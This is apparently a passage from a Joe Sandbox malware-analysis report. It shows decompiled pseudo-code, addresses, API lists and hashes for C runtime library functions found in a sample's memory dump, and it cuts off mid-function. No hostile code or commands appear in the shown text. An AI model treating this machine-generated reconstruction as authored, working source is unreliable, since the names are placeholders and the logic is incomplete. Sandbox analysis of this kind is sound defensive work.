                                                                                                                                                                                                    • API String ID: 3886058894-0
                                                                                                                                                                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                    • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                    			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t30 = __eflags;
                                                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                                                    				_t22 = __ebx;
                                                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                                                    				_push(0x4214d0);
                                                                                                                                                                                                    				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                    				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                    				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                    				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                    					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                    					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                    					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                    					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                    					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                    					E004147A2();
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E0040E21D(_t28);
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                    0x00414738
                                                                                                                                                                                                    0x0041473a
                                                                                                                                                                                                    0x0041473f
                                                                                                                                                                                                    0x00414749
                                                                                                                                                                                                    0x0041474b
                                                                                                                                                                                                    0x00414753
                                                                                                                                                                                                    0x00414777
                                                                                                                                                                                                    0x00414779
                                                                                                                                                                                                    0x0041477f
                                                                                                                                                                                                    0x00414783
                                                                                                                                                                                                    0x00414786
                                                                                                                                                                                                    0x00414791
                                                                                                                                                                                                    0x00414794
                                                                                                                                                                                                    0x0041479b
                                                                                                                                                                                                    0x00414755
                                                                                                                                                                                                    0x00414755
                                                                                                                                                                                                    0x00414759
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041475b
                                                                                                                                                                                                    0x00414760
                                                                                                                                                                                                    0x00414760
                                                                                                                                                                                                    0x00414759
                                                                                                                                                                                                    0x00414765
                                                                                                                                                                                                    0x00414769
                                                                                                                                                                                                    0x0041476e
                                                                                                                                                                                                    0x00414776

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                    • String ID: @.B
                                                                                                                                                                                                    • API String ID: 3521780317-470711618
                                                                                                                                                                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                    • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t37 = __edx;
                                                                                                                                                                                                    				_push(8);
                                                                                                                                                                                                    				_push(0x421140);
                                                                                                                                                                                                    				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                    				_t39 = _a4;
                                                                                                                                                                                                    				_t50 = _t39;
                                                                                                                                                                                                    				_t51 = _t50 != 0;
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					E0040FB29(_t39);
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                    					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                    					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                    					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t17 = 0x4227e0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                    						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                    						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                    							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                    					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                    					_v8 = 0xfffffffe;
                                                                                                                                                                                                    					E0040C735(_t39);
                                                                                                                                                                                                    					_t19 = 0;
                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                    					_t40 = 0x16;
                                                                                                                                                                                                    					 *_t27 = _t40;
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                    					_t19 = _t40;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E0040E21D(_t19);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x0040c73d
                                                                                                                                                                                                    0x0040c690
                                                                                                                                                                                                    0x0040c692
                                                                                                                                                                                                    0x0040c697
                                                                                                                                                                                                    0x0040c69e
                                                                                                                                                                                                    0x0040c6a3
                                                                                                                                                                                                    0x0040c6a8
                                                                                                                                                                                                    0x0040c6aa
                                                                                                                                                                                                    0x0040c6c8
                                                                                                                                                                                                    0x0040c6ce
                                                                                                                                                                                                    0x0040c6d1
                                                                                                                                                                                                    0x0040c6d6
                                                                                                                                                                                                    0x0040c6dc
                                                                                                                                                                                                    0x0040c6df
                                                                                                                                                                                                    0x0040c70f
                                                                                                                                                                                                    0x0040c70f
                                                                                                                                                                                                    0x0040c6e1
                                                                                                                                                                                                    0x0040c6e2
                                                                                                                                                                                                    0x0040c6e8
                                                                                                                                                                                                    0x0040c6eb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c6ed
                                                                                                                                                                                                    0x0040c6ee
                                                                                                                                                                                                    0x0040c70b
                                                                                                                                                                                                    0x0040c70b
                                                                                                                                                                                                    0x0040c6eb
                                                                                                                                                                                                    0x0040c714
                                                                                                                                                                                                    0x0040c71b
                                                                                                                                                                                                    0x0040c71e
                                                                                                                                                                                                    0x0040c725
                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                    0x0040c72a
                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                    0x0040c6ac
                                                                                                                                                                                                    0x0040c6b3
                                                                                                                                                                                                    0x0040c6b4
                                                                                                                                                                                                    0x0040c6b6
                                                                                                                                                                                                    0x0040c6b7
                                                                                                                                                                                                    0x0040c6b8
                                                                                                                                                                                                    0x0040c6b9
                                                                                                                                                                                                    0x0040c6ba
                                                                                                                                                                                                    0x0040c6bb
                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                    0x0040c6c3
                                                                                                                                                                                                    0x0040c731

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2805327698-0
                                                                                                                                                                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                    • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                    			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				LONG* _t21;
                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                    				LONG* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t35 = __eflags;
                                                                                                                                                                                                    				_t29 = __edx;
                                                                                                                                                                                                    				_t25 = __ebx;
                                                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                                                    				_push(0x421490);
                                                                                                                                                                                                    				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                    				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                    				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                    					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                    					__eflags = _t33 -  *0x422d38; // 0x771638
                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 != 0) {
                                                                                                                                                                                                    							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                    								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									_push(_t33);
                                                                                                                                                                                                    									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 =  *0x422d38; // 0x771638
                                                                                                                                                                                                    						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                    						_t33 =  *0x422d38; // 0x771638
                                                                                                                                                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                    						InterlockedIncrement(_t33);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                    					E00414067();
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                    					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E0040E21D(_t33);
                                                                                                                                                                                                    			}










                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                    0x00413fcc
                                                                                                                                                                                                    0x00413fce
                                                                                                                                                                                                    0x00413fd3
                                                                                                                                                                                                    0x00413fdd
                                                                                                                                                                                                    0x00413fdf
                                                                                                                                                                                                    0x00413fe7
                                                                                                                                                                                                    0x00414008
                                                                                                                                                                                                    0x0041400e
                                                                                                                                                                                                    0x00414012
                                                                                                                                                                                                    0x00414015
                                                                                                                                                                                                    0x00414018
                                                                                                                                                                                                    0x0041401e
                                                                                                                                                                                                    0x00414020
                                                                                                                                                                                                    0x00414022
                                                                                                                                                                                                    0x00414025
                                                                                                                                                                                                    0x0041402b
                                                                                                                                                                                                    0x0041402d
                                                                                                                                                                                                    0x0041402f
                                                                                                                                                                                                    0x00414035
                                                                                                                                                                                                    0x00414037
                                                                                                                                                                                                    0x00414038
                                                                                                                                                                                                    0x0041403d
                                                                                                                                                                                                    0x00414035
                                                                                                                                                                                                    0x0041402d
                                                                                                                                                                                                    0x0041403e
                                                                                                                                                                                                    0x00414043
                                                                                                                                                                                                    0x00414046
                                                                                                                                                                                                    0x0041404c
                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                    0x00414050
                                                                                                                                                                                                    0x00414056
                                                                                                                                                                                                    0x0041405d
                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                    0x00413fef
                                                                                                                                                                                                    0x00413ff4
                                                                                                                                                                                                    0x00413ff8
                                                                                                                                                                                                    0x00413ffd
                                                                                                                                                                                                    0x00414005

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00771638), ref: 00414050
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                    • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                    			E00413610() {
                                                                                                                                                                                                    				signed long long _v12;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				signed long long _v28;
                                                                                                                                                                                                    				signed char _t8;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					_v20 =  *0x41fb50;
                                                                                                                                                                                                    					_v28 =  *0x41fb48;
                                                                                                                                                                                                    					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                    					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                    					asm("fld1");
                                                                                                                                                                                                    					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                    					asm("fnstsw ax");
                                                                                                                                                                                                    					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						return __eax;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00413615
                                                                                                                                                                                                    0x0041361d
                                                                                                                                                                                                    0x00413634
                                                                                                                                                                                                    0x004135e0
                                                                                                                                                                                                    0x004135e9
                                                                                                                                                                                                    0x004135f5
                                                                                                                                                                                                    0x004135f8
                                                                                                                                                                                                    0x004135fb
                                                                                                                                                                                                    0x004135fd
                                                                                                                                                                                                    0x00413600
                                                                                                                                                                                                    0x00413605
                                                                                                                                                                                                    0x0041360f
                                                                                                                                                                                                    0x00413607
                                                                                                                                                                                                    0x0041360b
                                                                                                                                                                                                    0x0041360b
                                                                                                                                                                                                    0x0041361f
                                                                                                                                                                                                    0x00413625
                                                                                                                                                                                                    0x0041362d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041362f
                                                                                                                                                                                                    0x0041362f
                                                                                                                                                                                                    0x00413633
                                                                                                                                                                                                    0x00413633
                                                                                                                                                                                                    0x0041362d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                                                                                    • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                    • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				char _t82;
                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				signed char _t98;
                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t105 = __esi;
                                                                                                                                                                                                    				_t97 = __edx;
                                                                                                                                                                                                    				_t104 = _a4;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t121 = _t104;
                                                                                                                                                                                                    				if(_t104 != 0) {
                                                                                                                                                                                                    					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                    					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                    					_v8 = _t70;
                                                                                                                                                                                                    					if(__eflags < 0) {
                                                                                                                                                                                                    						 *(_t104 + 4) = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                    					_push(_t87);
                                                                                                                                                                                                    					_push(_t70);
                                                                                                                                                                                                    					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                    					__eflags = _t71 - _t87;
                                                                                                                                                                                                    					_v12 = _t71;
                                                                                                                                                                                                    					if(_t71 < _t87) {
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return _t71 | 0xffffffff;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                    						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                    						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                    							_t73 =  *_t104;
                                                                                                                                                                                                    							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                    							_push(_t105);
                                                                                                                                                                                                    							_v16 = _t73 - _t92;
                                                                                                                                                                                                    							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                    							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                    								__eflags = _t98;
                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                    									__eflags = _v12 - _t87;
                                                                                                                                                                                                    									if(_v12 != _t87) {
                                                                                                                                                                                                    										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                    										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                    											L40:
                                                                                                                                                                                                    											_t75 = _v16 + _v12;
                                                                                                                                                                                                    											__eflags = _t75;
                                                                                                                                                                                                    											L41:
                                                                                                                                                                                                    											return _t75;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                    										__eflags = _t99 - _t87;
                                                                                                                                                                                                    										if(_t99 != _t87) {
                                                                                                                                                                                                    											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                    											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                    											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                    											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												L39:
                                                                                                                                                                                                    												_t66 =  &_v12;
                                                                                                                                                                                                    												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                    												__eflags =  *_t66;
                                                                                                                                                                                                    												goto L40;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_push(2);
                                                                                                                                                                                                    											_push(0);
                                                                                                                                                                                                    											_push(_v8);
                                                                                                                                                                                                    											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(_v12);
                                                                                                                                                                                                    												_push(_v8);
                                                                                                                                                                                                    												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                    												__eflags = _t81;
                                                                                                                                                                                                    												if(_t81 >= 0) {
                                                                                                                                                                                                    													_t82 = 0x200;
                                                                                                                                                                                                    													__eflags = _a4 - 0x200;
                                                                                                                                                                                                    													if(_a4 > 0x200) {
                                                                                                                                                                                                    														L35:
                                                                                                                                                                                                    														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                    														L36:
                                                                                                                                                                                                    														_a4 = _t82;
